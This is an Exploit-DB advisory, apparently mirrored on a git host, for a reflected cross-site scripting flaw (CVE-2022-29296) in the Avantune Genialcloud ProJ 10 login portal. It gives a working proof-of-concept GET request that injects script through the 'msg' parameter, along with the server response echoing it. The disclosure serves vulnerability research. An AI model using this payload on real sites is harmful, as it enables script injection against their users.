bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/webapps/50955.txt
Offensive Security 29e275db94 DB: 2022-06-15 
16 changes to exploits/shellcodes

Real Player v.20.0.8.310 G2 Control - 'DoGoToURL()' Remote Code Execution (RCE)
Real Player 16.0.3.51 - 'external::Import()' Directory Traversal to Remote Code Execution (RCE)
HP LaserJet Professional M1210 MFP Series Receive Fax Service - Unquoted Service Path
Marval MSM v14.19.0.12476 - Remote Code Execution (RCE) (Authenticated)
Virtua Software Cobranca 12S - SQLi
Marval MSM v14.19.0.12476 - Cross-Site Request Forgery (CSRF)
Algo 8028 Control Panel - Remote Code Execution (RCE) (Authenticated)
TP-Link Router AX50 firmware 210730 - Remote Code Execution (RCE) (Authenticated)
Sourcegraph Gitserver 3.36.3 - Remote Code Execution (RCE)
Avantune Genialcloud ProJ 10 - Cross-Site Scripting (XSS)
Pandora FMS v7.0NG.742 - Remote Code Execution (RCE) (Authenticated)
phpIPAM 1.4.5 - Remote Code Execution (RCE) (Authenticated)
ChurchCRM 4.4.5 - SQLi
Old Age Home Management System 1.0 - SQLi Authentication Bypass
SolarView Compact 6.00 - 'time_begin' Cross-Site Scripting (XSS)
SolarView Compact 6.00 - 'pow' Cross-Site Scripting (XSS)
2022-06-15 05:01:57 +00:00

46 lines
No EOL
1.9 KiB
Text
Raw Blame History

# Exploit Title: Avantune Genialcloud ProJ 10 - Cross-Site Scripting (XSS)
# Date: 2022-06-01
# Exploit Author: Andrea Intilangelo
# Vendor Homepage: https://www.avantune.com
# Software Link: https://www.genialcloud.com - https://www.genialcloud.com/discover-genialcloud-proj - https://store.genialcloud.com
# Version: 10
# Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 100.0, Microsoft Edge 101.0.1210.39)
# CVE: CVE-2022-29296
Reflected Cross-Site Scripting (XSS) vulnerability in login-portal webpage of Genialcloud ProJ (and potentially in other platforms from the
same software house "Avantune" since codebase seems shared with their other products: Facsys and Analysis) allows remote attacker to inject
and execute arbitrary web scripts or HTML via a crafted payload.
Request parameters affected is "msg".
PoC Request:
GET /eportal/?nologon=1&msg=Invalid%20username%20or%20password%27%3Balert%28%22y0%21+XSS+here+%3A%29%22%29%2F%2F HTTP/1.1
Host: [REDACTED]
Cookie: ASP.NET_SessionId=3recnmmlpo1glzzyejdoezk2
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36
Connection: close
Cache-Control: max-age=0
PoC Response:
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/10.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 11 May 2022 10:51:10 GMT
Connection: close
Content-Length: 8162
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><link rel="stylesheet"
...[SNIP]...
<script type="text/javascript"> var Msg = 'Invalid username or password';alert("y0! XSS here :)")//';</script>
...[SNIP]...
Reference in a new issue View git blame Copy permalink